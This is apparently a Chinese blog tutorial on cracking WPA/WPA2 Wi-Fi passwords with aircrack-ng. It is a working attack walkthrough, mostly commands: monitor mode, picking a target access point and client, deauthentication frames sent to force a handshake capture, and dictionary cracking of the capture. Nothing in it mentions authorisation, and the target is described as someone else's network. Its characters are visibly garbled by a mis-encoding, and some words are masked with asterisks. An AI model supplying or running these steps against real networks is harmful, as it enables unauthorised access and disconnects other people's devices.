WAP/WAP2無(wú)線網(wǎng)絡(luò)破解

聲明：本文參考了網(wǎng)上的眾多資料，加上自己的一晚上的奮斗實(shí)際操作總結(jié)

其中http://netsecurity.51cto.com/art/201105/264844_all.htm該文寫的比較詳細(xì)，可做參考。

1.查看無(wú)線網(wǎng)卡狀態(tài)，激活無(wú)線網(wǎng)卡

ifconfig

ifconfig wlan0 up

2. 激活無(wú)線網(wǎng)卡至monitor即監(jiān)聽(tīng)模式

airmon-ng start wlan0

3. 探測(cè)無(wú)線網(wǎng)絡(luò)，抓取無(wú)線數(shù)據(jù)包

在正式抓包之前，一般都是先進(jìn)行預(yù)來(lái)探測(cè)，來(lái)獲取當(dāng)前無(wú)線網(wǎng)絡(luò)概況，包括AP的SSID、MAC地址、工作頻道、無(wú)線客戶端MAC及數(shù)量等。

注意：此處的客戶端是指無(wú)線AP的客戶端，并非破解的主機(jī)

airodump-ng mon0

注意：此處的BSSID為AP的mac,STATION為客戶端的mac

找破解的目標(biāo)是盡量選擇排行靠前，且有數(shù)據(jù)(data)的AP,記下這里的AP和STATION的mac,及信道（CH）

BSSID              STATION             CH

C8:3A:35:2D:5E:78  88:E3:AB:C3:A6:0F    7

airodump-ng -c 7 –w abc--bssid C8:3A:35:2D:5E:78 mon0

#對(duì)該AP抓取數(shù)據(jù)包并寫入abc文件

-c:該AP的無(wú)線信道

-w:表示要寫入的文件

--bssid:AP的mac地址

4. 進(jìn)行Deauth***加速破解過(guò)程。

上面的窗口不關(guān)，讓其繼續(xù)抓包，此時(shí)重開(kāi)第二個(gè)窗口進(jìn)行Deauth***加速破解過(guò)程。

aireplay-ng -0 1 -aC8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

運(yùn)行后可能會(huì)出現(xiàn)如下錯(cuò)誤

根據(jù)提示修改命令如下：

aireplay-ng--ignore-negative-one -0 1 -a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

可以看到不再報(bào)錯(cuò)，但是標(biāo)識(shí)部分為【0 |31ACKS】表示沒(méi)有數(shù)據(jù)應(yīng)答，因此需要重復(fù)該步驟知道這里有數(shù)據(jù)應(yīng)答且第一個(gè)窗口出現(xiàn)握手包才行，才可以進(jìn)行下一步操作，可以調(diào)高這里的***數(shù)字

aireplay-ng--ignore-negative-one -0 10-a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

注意：該處出現(xiàn)應(yīng)答數(shù)據(jù)

且剛才抓包數(shù)據(jù)的第一個(gè)窗口出現(xiàn)握手包，由于該出握手包一閃而過(guò)，在第二個(gè)窗口進(jìn)行Deauth***需要留心觀察第一個(gè)窗口（我這里是截圖網(wǎng)上的，實(shí)際難以截圖，一閃而過(guò)）

5.做完上面關(guān)鍵的一步，接下來(lái)是激動(dòng)人心的破解步驟了，WAP/WAP2均需要字典來(lái)破解，請(qǐng)?zhí)崆跋螺d好字典并放在破解系統(tǒng)上面

aircrack-ng -w beini.txt  abc*.cap

-w:接破解的密碼字典

abc*.cap 為第一個(gè)窗口抓取的數(shù)據(jù)包

接下來(lái)的就是坐等結(jié)果，能不能成功看你的字典好壞，對(duì)方AP密碼難度系數(shù)，電腦的破解速度，和一點(diǎn)點(diǎn)運(yùn)氣了

注明：不知道為什么復(fù)制不了截圖上去，詳情請(qǐng)見(jiàn)附件